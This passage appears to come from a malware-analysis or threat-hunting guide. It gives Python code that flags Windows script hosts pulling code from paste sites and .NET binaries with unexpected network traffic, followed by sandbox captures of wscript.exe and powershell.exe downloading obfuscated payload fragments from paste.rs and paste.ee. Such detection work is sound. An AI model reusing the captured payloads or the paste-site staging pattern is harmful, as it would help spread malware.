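PASTE_SERVICES = {"paste.rs", "paste.ee", "pastebin.com"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
# .NET utilities with no business making outbound HTTP; common injection hosts.
INJECTION_TARGETS = {"aspnet_compiler.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe"}


def parse_dns(text):
    """Map every answered IP back to the name(s) that resolved to it."""
    ip_to_names = defaultdict(set)
    for line in text.splitlines():
        if line.strip():
            name, ip = line.split()
            ip_to_names[ip].add(name.lower())
    return ip_to_names


def parse_sessions(text):
    """One dict per session row; the image name is the last path component."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        sid, src, sport, dst, dport, pid, image = line.split(maxsplit=6)
        rows.append({"session": int(sid), "src": src, "dst": dst, "dport": int(dport),
                     "pid": int(pid), "path": image,
                     "image": image.rsplit("\\", 1)[-1].lower()})
    return rows


def triage(sessions_text, dns_text):
    """Return the sessions that match a rule, each with resolved names and reasons."""
    ip_to_names = parse_dns(dns_text)
    findings = []
    for s in parse_sessions(sessions_text):
        names = ip_to_names.get(s["dst"], {s["dst"]})  # fall back to the bare IP
        reasons = []
        if s["image"] in SCRIPT_HOSTS and names & PASTE_SERVICES:
            reasons.append("script-host-fetching-paste-service")
        if s["image"] in INJECTION_TARGETS:
            # destination is irrelevant here: this binary should be silent on the wire
            reasons.append("network-from-injection-target")
        if reasons:
            findings.append({**s, "names": sorted(names), "reasons": reasons})
    return findings


# Constructed copies of the two request shapes the report captured (headers
# shortened to the ones the classifier looks at).
WSCRIPT_REQUEST = ("GET /LDDIb HTTP/1.1\r\nAccept: */*\r\n"
                   "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; "
                   "Win64; x64; Trident/7.0)\r\nHost: paste.rs\r\nConnection: Keep-Alive\r\n\r\n")
POWERSHELL_REQUEST = "GET /r/IUrXP/0 HTTP/1.1\r\nHost: paste.ee\r\nConnection: Keep-Alive\r\n\r\n"


def request_flags(raw):
    """Header fingerprints: no User-Agent at all (what System.Net.WebClient sends),
    or the legacy IE compatibility string that WinINet-based downloaders such as
    MSXML2.XMLHTTP from VBScript send by default. Heuristics, not proof."""
    head = raw.partition("\r\n\r\n")[0].split("\r\n")
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (h.partition(":") for h in head[1:])}
    flags = []
    ua = headers.get("user-agent")
    if ua is None:
        flags.append("no-user-agent")
    elif "MSIE 7.0" in ua and "Trident/7.0" in ua:
        flags.append("legacy-ie-compat-ua")
    if headers.get("host", "").lower() in PASTE_SERVICES:
        flags.append("paste-service-host")
    return flags


if __name__ == "__main__":
    for f in triage(SESSIONS, DNS_ANSWERS):
        print(f"session {f['session']} pid {f['pid']} {f['image']} -> "
              f"{','.join(f['names'])}:{f['dport']} {f['reasons']}")
    print("wscript.exe request   :", request_flags(WSCRIPT_REQUEST))
    print("powershell.exe request:", request_flags(POWERSHELL_REQUEST))
```

Run it as-is to see all five sessions flagged; in practice you would feed it the full session table exported from the report and extend the host lists from your own telemetry. The DNS join matters because the session table only carries IPs: without it a Cloudflare address such as 104.21.84.67 is anonymous, with it the paste.ee name is what drives the rule.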


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49790 | 45.63.94.214 | 443 | 7864 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 13:30:39 UTC | 317 | OUT | GET /LDDIb HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-ch
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                        Host: paste.rs
                                                        Connection: Keep-Alive
2024-12-17 13:30:40 UTC | 439 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 17 Dec 2024 13:30:39 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 79269
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        x-content-type-options: nosniff
                                                        permissions-policy: interest-cohort=()
                                                        x-frame-options: SAMEORIGIN
                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains;
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        2024-12-17 13:30:40 UTC15945INData Raw: 0d 0a 20 20 20 20 0d 0a 55 76 4c 67 53 47 65 4e 43 63 70 78 41 64 4a 20 3d 20 22 4c 78 42 66 4c 62 6d 47 5a 67 52 50 7a 62 4b 22 0d 0a 55 50 68 41 63 6d 4c 4c 69 62 6b 4b 47 5a 71 20 3d 20 22 57 64 43 49 4c 63 6b 72 4f 57 5a 57 51 5a 4e 22 0d 0a 57 4b 63 41 4a 4e 74 57 41 65 4f 47 6a 43 61 20 3d 20 22 68 6b 50 49 55 7a 62 72 57 5a 4b 6b 63 50 70 22 0d 0a 0d 0a 6f 65 78 42 4b 6f 47 70 63 4a 4e 68 50 57 66 20 3d 20 22 55 67 4b 63 4c 75 53 68 47 4f 4b 52 4c 64 57 22 0d 0a 65 4b 6b 65 47 69 74 4b 6d 50 63 47 47 4b 71 20 3d 20 22 6b 70 57 6d 4b 55 63 78 53 6b 4c 4c 57 57 50 22 0d 0a 5a 6d 41 63 4b 6f 47 69 53 69 55 4c 69 4b 7a 20 3d 20 22 5a 70 63 54 41 4c 4c 6d 4c 63 4c 73 4c 63 63 22 0d 0a 55 57 66 68 74 4c 4b 57 55 55 67 6f 50 71 7a 20 3d 20 22 62 54 70 6b
                                                        Data Ascii: UvLgSGeNCcpxAdJ = "LxBfLbmGZgRPzbK"UPhAcmLLibkKGZq = "WdCILckrOWZWQZN"WKcAJNtWAeOGjCa = "hkPIUzbrWZKkcPp"oexBKoGpcJNhPWf = "UgKcLuShGOKRLdW"eKkeGitKmPcGGKq = "kpWmKUcxSkLLWWP"ZmAcKoGiSiULiKz = "ZpcTALLmLcLsLcc"UWfhtLKWUUgoPqz = "bTpk
                                                        2024-12-17 13:30:40 UTC16384INData Raw: 20 22 6b 4e 69 4a 74 70 69 6d 6e 61 69 70 69 4b 55 22 0d 0a 4f 61 57 57 71 57 68 57 68 4c 4c 69 4c 57 6b 20 3d 20 22 4c 4e 5a 47 69 50 41 66 47 57 50 78 47 4b 72 22 0d 0a 42 64 75 70 57 55 55 4f 41 62 49 61 70 65 57 20 3d 20 22 57 57 4b 69 4c 74 4c 6c 50 4c 7a 4c 4c 6d 55 22 0d 0a 63 4c 66 57 61 65 4b 52 63 65 41 55 6b 67 75 20 3d 20 22 41 53 75 73 4c 57 4b 6f 7a 6f 69 53 6d 4f 61 22 0d 0a 52 52 66 62 72 6d 4c 4e 4c 4c 53 76 5a 4c 73 20 3d 20 22 62 57 76 68 6b 47 4b 7a 7a 52 4b 53 6d 64 69 22 0d 0a 0d 0a 69 6b 69 4e 68 68 5a 4c 4b 62 63 4b 57 41 4b 20 3d 20 22 62 76 4b 6f 6b 62 4c 4f 4c 48 57 57 4b 63 65 22 0d 0a 6b 4c 55 6b 52 4b 55 69 6f 69 4b 47 69 6b 57 20 3d 20 22 57 70 4b 6b 47 4c 63 6d 6f 55 70 68 69 63 4b 22 0d 0a 72 4c 6b 68 4c 74 61 66 51 43 72
                                                        Data Ascii: "kNiJtpimnaipiKU"OaWWqWhWhLLiLWk = "LNZGiPAfGWPxGKr"BdupWUUOAbIapeW = "WWKiLtLlPLzLLmU"cLfWaeKRceAUkgu = "ASusLWKozoiSmOa"RRfbrmLNLLSvZLs = "bWvhkGKzzRKSmdi"ikiNhhZLKbcKWAK = "bvKokbLOLHWWKce"kLUkRKUioiKGikW = "WpKkGLcmoUphicK"rLkhLtafQCr
                                                        2024-12-17 13:30:40 UTC16384INData Raw: 70 55 4a 62 72 70 6f 42 65 73 57 7a 52 20 3d 20 22 65 69 57 4c 6c 4b 4b 5a 4c 52 61 47 62 4f 4a 22 0d 0a 72 6f 6f 7a 75 74 52 47 68 6f 75 6d 66 4c 66 20 3d 20 22 6d 63 75 57 63 50 57 67 4b 4b 6d 69 52 7a 51 22 0d 0a 78 5a 43 6b 6d 52 4c 4c 70 55 4c 4b 69 42 4f 20 3d 20 22 61 6b 65 57 64 57 62 57 4b 71 7a 71 4c 4c 4b 22 0d 0a 50 70 43 52 50 4c 4c 4f 57 78 6b 69 55 4c 4c 20 3d 20 22 4c 6e 4e 51 4c 71 4c 63 4c 4b 47 6d 71 6b 63 22 0d 0a 0d 0a 6c 62 68 4c 66 69 71 6f 4c 64 57 4c 72 7a 41 20 3d 20 22 70 4b 69 6f 55 4c 62 6b 6e 4c 73 6d 69 62 4c 22 0d 0a 41 50 6b 6e 4c 4c 6d 4c 48 55 4c 52 52 4c 67 20 3d 20 22 57 54 43 4b 47 57 47 71 7a 4b 62 4c 50 55 51 22 0d 0a 47 53 69 7a 4a 65 4f 49 4c 4e 4c 78 47 4b 51 20 3d 20 22 6f 55 63 4f 65 4c 4b 55 6a 6c 47 7a 4f 47
                                                        Data Ascii: pUJbrpoBesWzR = "eiWLlKKZLRaGbOJ"roozutRGhoumfLf = "mcuWcPWgKKmiRzQ"xZCkmRLLpULKiBO = "akeWdWbWKqzqLLK"PpCRPLLOWxkiULL = "LnNQLqLcLKGmqkc"lbhLfiqoLdWLrzA = "pKioULbknLsmibL"APknLLmLHULRRLg = "WTCKGWGqzKbLPUQ"GSizJeOILNLxGKQ = "oUcOeLKUjlGzOG
                                                        2024-12-17 13:30:40 UTC16384INData Raw: 5a 55 69 70 7a 70 63 75 7a 6f 6e 69 6f 41 22 0d 0a 62 47 54 76 65 5a 68 57 62 61 5a 41 64 63 69 20 3d 20 22 55 6d 49 57 6e 43 73 57 42 57 6b 57 4b 4c 4c 22 0d 0a 70 52 4c 57 4c 6b 66 5a 64 50 75 4b 75 69 4c 20 3d 20 22 57 67 51 52 4b 5a 62 5a 65 4e 4b 57 4b 4a 57 22 0d 0a 0d 0a 76 41 71 4c 4f 63 78 62 66 78 50 6c 61 53 4a 20 3d 20 22 68 76 73 61 67 6e 6b 6e 57 69 48 4c 57 48 70 22 0d 0a 4b 75 62 66 7a 62 63 47 4c 50 6f 4c 42 55 73 20 3d 20 22 4c 69 66 62 55 65 69 54 62 47 41 69 57 74 63 22 0d 0a 6f 65 55 69 69 66 47 63 51 4c 57 4e 4b 74 47 20 3d 20 22 4c 4e 4c 6b 65 50 63 4b 4b 7a 69 6d 52 6b 6c 22 0d 0a 69 63 6f 68 47 51 55 51 41 48 63 47 76 42 5a 20 3d 20 22 61 4b 4b 4b 4c 57 65 6f 76 4f 41 53 65 62 4c 22 0d 0a 68 6e 71 72 55 71 78 71 61 42 63 51 61 57
                                                        Data Ascii: ZUipzpcuzonioA"bGTveZhWbaZAdci = "UmIWnCsWBWkWKLL"pRLWLkfZdPuKuiL = "WgQRKZbZeNKWKJW"vAqLOcxbfxPlaSJ = "hvsagnknWiHLWHp"KubfzbcGLPoLBUs = "LifbUeiTbGAiWtc"oeUiifGcQLWNKtG = "LNLkePcKKzimRkl"icohGQUQAHcGvBZ = "aKKKLWeovOASebL"hnqrUqxqaBcQaW
                                                        2024-12-17 13:30:40 UTC14172INData Raw: 0a 62 4c 61 47 6f 67 6c 57 78 6b 62 47 72 6b 72 20 3d 20 22 50 63 4c 6f 49 73 4f 6e 5a 66 4b 4c 4e 74 4f 22 0d 0a 69 47 41 6d 5a 53 54 57 4b 69 43 41 4c 57 42 20 3d 20 22 6d 63 62 6c 4c 67 71 75 4e 74 75 4b 6f 6f 64 22 0d 0a 0d 0a 73 6e 4b 4f 64 74 6d 71 4e 74 4b 43 50 6d 70 20 3d 20 22 4f 47 64 75 69 62 4c 69 47 73 66 4c 4c 63 65 22 0d 0a 61 78 6b 52 4b 64 65 55 4a 50 47 63 7a 63 65 20 3d 20 22 47 5a 4c 4b 47 66 57 73 4b 65 75 55 50 4b 53 22 0d 0a 6b 62 57 78 47 6f 4c 4b 42 57 55 4e 52 4c 4e 20 3d 20 22 62 66 42 47 7a 55 71 4b 69 74 7a 6a 50 74 42 22 0d 0a 4a 7a 42 55 78 4c 4c 5a 63 65 55 61 43 4c 6e 20 3d 20 22 71 63 68 5a 4c 65 47 6b 6f 42 47 41 5a 4c 42 22 0d 0a 69 57 4f 42 6f 4e 74 55 70 4c 4b 4b 4b 63 4c 20 3d 20 22 68 52 63 57 4c 55 4b 6f 48 57 57
                                                        Data Ascii: bLaGoglWxkbGrkr = "PcLoIsOnZfKLNtO"iGAmZSTWKiCALWB = "mcblLgquNtuKood"snKOdtmqNtKCPmp = "OGduibLiGsfLLce"axkRKdeUJPGczce = "GZLKGfWsKeuUPKS"kbWxGoLKBWUNRLN = "bfBGzUqKitzjPtB"JzBUxLLZceUaCLn = "qchZLeGkoBGAZLB"iWOBoNtUpLKKKcL = "hRcWLUKoHWW


                                                        Session ID:3
                                                        Source IP:192.168.2.6
                                                        Source Port:49880
                                                        Destination IP:104.21.84.67
                                                        Destination Port:443
                                                        PID:7972
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Timestamp:2024-12-17 13:31:14 UTC
                                                        Bytes transferred:67
                                                        Direction:OUT
                                                        Data:GET /r/IUrXP/0 HTTP/1.1
                                                        Host: paste.ee
                                                        Connection: Keep-Alive
                                                        Timestamp:2024-12-17 13:31:15 UTC
                                                        Bytes transferred:1280
                                                        Direction:IN
                                                        Data:HTTP/1.1 200 OK
                                                        Date: Tue, 17 Dec 2024 13:31:14 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: max-age=2592000
                                                        strict-transport-security: max-age=63072000
                                                        x-frame-options: DENY
                                                        x-content-type-options: nosniff
                                                        x-xss-protection: 1; mode=block
                                                        content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                        CF-Cache-Status: HIT
                                                        Age: 24599
                                                        Last-Modified: Tue, 17 Dec 2024 06:41:15 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NpxBhqOayCC49ET9Un5JRMBnZzY2lZGmwQUaETW1wihDvPMf7OJfhACk3GPKfLLmGN7TTiF4X4ckTgn32aNAZyvgWYDaAeMNCutoqNYEfNzKNKuzyXHfq4zkRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f3745ba1fcf1819-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-12-17 13:31:15 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 35 36 35 26 6d 69 6e 5f 72 74 74 3d 31 35 36 30 26 72 74 74 5f 76 61 72 3d 35 39 36 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 38 31 37 30 35 30 26 63 77 6e 64 3d 32 31 35 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 62 37 35 64 61 34 64 39 36 38 34 64 32 66 36 62 26 74 73 3d 34 35 39 26 78 3d 30 22 0d 0a 0d 0a
                                                        Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1560&rtt_var=596&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1817050&cwnd=215&unsent_bytes=0&cid=b75da4d9684d2f6b&ts=459&x=0"
                                                        2024-12-17 13:31:15 UTC1243INData Raw: 33 38 33 32 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35
                                                        Data Ascii: 3832AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5
                                                        2024-12-17 13:31:15 UTC1369INData Raw: 67 44 4a 34 51 78 4e 38 66 44 39 33 41 2f 4e 73 66 44 36 33 67 39 4e 55 66 44 78 33 77 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 69 33 51 34 4e 30 64 44 58 33 51 31 4e 51 64 44 54 33 77 7a 4e 34 63 44 4b 33 41 78 4e 49 63 44 42 33 41 67 4e 38 62 44 37 32 67 75 4e 59 62 44 77 32 67 72 4e 30 61 44 73 32 41 71 4e 63 61 44 6a 32 51 6e 4e 73 5a 44 61 32 67 6c 4e 55 5a 44 52 32 77 69 4e 6b 59 44 49 32 41 68 4e 4d 55 44 39 31 41 66 4e 73 58 44 36 31 41 5a 4e 49 57 44 68 41 41 51 41 6b 42 67 42 41 44 41 41 41 73 44 61 37 51 47 4d 77 41 41 41 41 41 42 41 47 41 4c 41 37 41 7a 4f 6f 6f 44 31 36 41 74 4f 41 72 44 6d 36 67 6e 4f 55 70 44 50 36 67 6a 4f 6f 6f 44 45 35 41 65 4f 49 6e 44 72 35 67 61 4f 49 6d 44 68 35 41 59 4f 38 42 41 41 41 41 44 41 47 41 49 41 34 41 49 4f
                                                        Data Ascii: gDJ4QxN8fD93A/NsfD63g9NUfDx3w6NkeDo3w5NYeDi3Q4N0dDX3Q1NQdDT3wzN4cDK3AxNIcDB3AgN8bD72guNYbDw2grN0aDs2AqNcaDj2QnNsZDa2glNUZDR2wiNkYDI2AhNMUD91AfNsXD61AZNIWDhAAQAkBgBADAAAsDa7QGMwAAAAABAGALA7AzOooD16AtOArDm6gnOUpDP6gjOooDE5AeOInDr5gaOImDh5AYO8BAAAADAGAIA4AIO
                                                        2024-12-17 13:31:15 UTC1369INData Raw: 44 78 36 77 72 4f 30 71 44 72 36 51 71 4f 63 71 44 6c 36 77 6f 4f 45 71 44 66 36 51 6e 4f 73 70 44 5a 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 77 4b 4f 6b 69 44 6e 34 51 4a 4f 4d 69 44 68 34 77 48 4f 30 68 44 62 34 51 47 4f 63 68 44 56 34 77 45 4f 45 68 44 50 34 51 44 4f 73 67 44 4a 34 77 42 4f 55 67 44 44 34 51 77 4e 38 66 44 39 33 77 2b 4e 6b 66 44 33 33 51 39 4e 4d
                                                        Data Ascii: Dx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NM
                                                        2024-12-17 13:31:15 UTC1369INData Raw: 36 31 41 65 4e 59 58 44 30 31 67 63 4e 41 58 44 75 31 41 62 4e 6f 57 44 6f 31 67 5a 4e 51 57 44 69 31 41 59 4e 34 56 44 63 31 67 57 4e 67 56 44 57 31 41 56 4e 49 56 44 51 31 67 54 4e 77 55 44 4b 31 41 53 4e 59 55 44 45 31 67 51 4e 41 51 44 2b 30 41 50 4e 6f 54 44 34 30 67 4e 4e 51 54 44 79 30 41 4d 4e 34 53 44 73 30 67 4b 4e 67 53 44 6d 30 41 4a 4e 49 53 44 67 30 67 48 4e 77 52 44 61 30 41 47 4e 59 52 44 55 30 67 45 4e 41 52 44 4f 30 41 44 4e 6f 51 44 49 30 67 42 4e 51 51 44 43 30 41 77 4d 34 50 44 38 7a 67 2b 4d 67 50 44 32 7a 41 39 4d 49 50 44 77 7a 67 37 4d 77 4f 44 71 7a 41 36 4d 59 4f 44 6b 7a 67 34 4d 41 4f 44 65 7a 41 33 4d 6f 4e 44 59 7a 67 31 4d 51 4e 44 53 7a 41 30 4d 34 4d 44 4d 7a 67 79 4d 67 4d 44 47 7a 41 78 4d 49 4d 44 41 79 67 76 4d 77 4c
                                                        Data Ascii: 61AeNYXD01gcNAXDu1AbNoWDo1gZNQWDi1AYN4VDc1gWNgVDW1AVNIVDQ1gTNwUDK1ASNYUDE1gQNAQD+0APNoTD40gNNQTDy0AMN4SDs0gKNgSDm0AJNISDg0gHNwRDa0AGNYRDU0gENARDO0ADNoQDI0gBNQQDC0AwM4PD8zg+MgPD2zA9MIPDwzg7MwODqzA6MYODkzg4MAODezA3MoNDYzg1MQNDSzA0M4MDMzgyMgMDGzAxMIMDAygvMwL
                                                        2024-12-17 13:31:15 UTC1369INData Raw: 36 51 6d 4f 63 70 44 56 36 77 6b 4f 45 70 44 50 36 51 6a 4f 73 6f 44 4a 36 77 68 4f 55 6f 44 44 36 51 51 4f 38 6e 44 39 35 77 65 4f 6b 6e 44 33 35 51 64 4f 4d 6e 44 78 35 77 62 4f 30 6d 44 72 35 51 61 4f 63 6d 44 6c 35 77 59 4f 45 6d 44 66 35 51 58 4f 73 6c 44 5a 35 77 56 4f 55 6c 44 54 35 51 55 4f 38 6b 44 4e 35 77 53 4f 6b 6b 44 48 35 51 52 4f 4d 6b 44 42 34 77 50 4f 30 6a 44 37 34 51 4f 4f 63 6a 44 31 34 77 4d 4f 45 6a 44 76 34 51 4c 4f 45 68 44 51 34 77 44 4f 34 67 44 4e 34 41 44 4f 73 67 44 4b 34 51 43 4f 67 67 44 48 34 67 42 4f 55 67 44 45 34 41 77 4e 38 66 44 2b 33 51 2f 4e 77 66 44 37 33 67 2b 4e 6b 66 44 34 33 77 39 4e 59 66 44 31 33 41 38 4e 38 65 44 75 33 51 37 4e 77 65 44 72 33 67 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 6c 33 41 35 4e 4d 65 44
                                                        Data Ascii: 6QmOcpDV6wkOEpDP6QjOsoDJ6whOUoDD6QQO8nD95weOknD35QdOMnDx5wbO0mDr5QaOcmDl5wYOEmDf5QXOslDZ5wVOUlDT5QUO8kDN5wSOkkDH5QROMkDB4wPO0jD74QOOcjD14wMOEjDv4QLOEhDQ4wDO4gDN4ADOsgDK4QCOggDH4gBOUgDE4AwN8fD+3Q/NwfD73g+NkfD43w9NYfD13A8N8eDu3Q7NweDr3g6NkeDo3w5NYeDl3A5NMeD
                                                        2024-12-17 13:31:15 UTC1369INData Raw: 41 41 41 41 38 54 30 2f 45 68 50 41 37 6a 64 2b 73 69 50 69 30 6a 74 39 30 61 50 77 30 7a 4a 38 51 4b 50 61 74 7a 59 36 4d 76 4f 2b 6d 6a 7a 35 73 62 4f 7a 67 54 2f 34 6b 53 4e 2f 51 54 35 30 51 33 4d 4e 4f 44 62 79 51 76 4d 54 4c 54 76 79 51 6f 4d 65 45 7a 37 78 55 63 4d 63 42 44 68 77 63 44 41 41 41 41 55 41 55 41 41 41 38 54 76 2f 73 36 50 69 34 44 33 39 4d 74 4f 57 6f 6a 44 36 59 51 4f 2b 6e 7a 39 34 49 7a 4e 32 66 44 35 33 49 39 4e 41 66 6a 72 32 6b 50 4e 51 4d 54 30 7a 38 37 4d 74 4f 7a 6d 7a 6b 34 4d 33 4e 54 5a 7a 4d 31 4d 42 4e 7a 4c 7a 30 78 4d 4c 49 54 2b 79 55 72 4d 68 4b 54 55 79 6f 6b 4d 50 45 54 2b 78 63 63 4d 37 47 44 6a 78 38 58 4d 42 46 44 49 78 59 52 4d 44 41 54 32 77 41 4e 4d 4a 44 7a 68 77 41 49 4d 47 42 44 4d 77 6b 42 4d 53 41 41 41
                                                        Data Ascii: AAAA8T0/EhPA7jd+siPi0jt90aPw0zJ8QKPatzY6MvO+mjz5sbOzgT/4kSN/QT50Q3MNODbyQvMTLTvyQoMeEz7xUcMcBDhwcDAAAAUAUAAA8Tv/s6Pi4D39MtOWojD6YQO+nz94IzN2fD53I9NAfjr2kPNQMT0z87MtOzmzk4M3NTZzM1MBNzLz0xMLIT+yUrMhKTUyokMPET+xccM7GDjx8XMBFDIxYRMDAT2wANMJDzhwAIMGBDMwkBMSAAA
                                                        2024-12-17 13:31:15 UTC1369INData Raw: 78 4d 4e 4e 6a 4c 7a 77 67 4d 65 4b 44 66 79 77 6d 4d 58 4a 54 54 78 77 61 4d 58 47 6a 6a 78 45 59 4d 32 46 44 49 78 67 42 4d 7a 44 7a 36 77 30 4c 4d 32 43 54 70 77 73 4a 4d 52 43 6a 69 77 73 48 4d 31 42 6a 62 77 4d 47 41 41 41 41 64 41 51 41 67 41 41 41 41 2b 63 75 50 63 37 44 66 2b 51 69 50 65 34 44 47 2b 55 51 50 33 33 7a 37 39 67 64 50 4f 33 7a 77 39 30 62 50 34 32 7a 6b 39 6f 59 50 6d 31 6a 58 39 38 52 50 58 77 6a 31 38 73 4d 50 34 78 6a 63 38 73 41 50 44 73 54 39 37 30 2b 4f 6b 76 7a 32 37 4d 39 4f 4c 76 7a 77 37 67 37 4f 6d 75 6a 6e 37 49 35 4f 4b 75 54 67 37 67 33 4f 77 74 44 61 37 41 32 4f 59 74 7a 53 37 38 7a 4f 33 6f 54 2b 36 30 73 4f 68 71 6a 65 36 51 6e 4f 75 70 44 61 36 41 6d 4f 63 70 54 55 36 49 6b 4f 32 6f 54 4a 36 6b 68 4f 48 6b 7a 34 35
                                                        Data Ascii: xMNNjLzwgMeKDfywmMXJTTxwaMXGjjxEYM2FDIxgBMzDz6w0LM2CTpwsJMRCjiwsHM1BjbwMGAAAAdAQAgAAAA+cuPc7Df+QiPe4DG+UQP33z79gdPO3zw90bP42zk9oYPm1jX98RPXwj18sMP4xjc8sAPDsT970+Okvz27M9OLvzw7g7Omujn7I5OKuTg7g3OwtDa7A2OYtzS78zO3oT+60sOhqje6QnOupDa6AmOcpTU6IkO2oTJ6khOHkz45
                                                        2024-12-17 13:31:15 UTC1369INData Raw: 4e 50 4d 44 36 7a 49 74 4d 65 4b 54 62 79 49 6d 4d 48 4a 7a 49 79 63 51 4d 31 44 7a 7a 77 45 4c 4d 54 43 6a 54 41 41 41 41 30 43 41 42 67 41 41 41 41 38 44 5a 2f 63 31 50 48 39 6a 4f 2b 49 6f 50 43 35 44 4d 2b 4d 69 50 59 30 44 39 39 51 63 50 33 32 54 6e 39 49 44 50 79 76 7a 54 37 6f 54 4f 39 67 44 33 34 49 46 4f 49 63 7a 38 33 6b 35 4e 47 5a 54 4f 31 73 56 4e 34 55 44 43 7a 63 50 41 41 41 41 52 41 51 41 45 41 41 41 41 34 4d 65 4e 56 57 44 65 31 59 43 4e 41 50 44 71 79 73 75 4d 79 4b 44 6a 79 41 56 4d 7a 42 54 67 77 41 46 41 41 41 41 4a 41 51 41 41 41 38 6a 73 2f 30 32 50 36 34 44 36 2b 73 72 50 4f 32 44 33 39 63 43 50 33 76 6a 70 37 38 31 4f 45 6f 6a 39 34 34 37 4e 79 62 54 58 7a 6b 38 4d 35 4d 7a 45 79 59 76 4d 45 45 6a 48 41 41 41 41 30 41 77 41 77 44
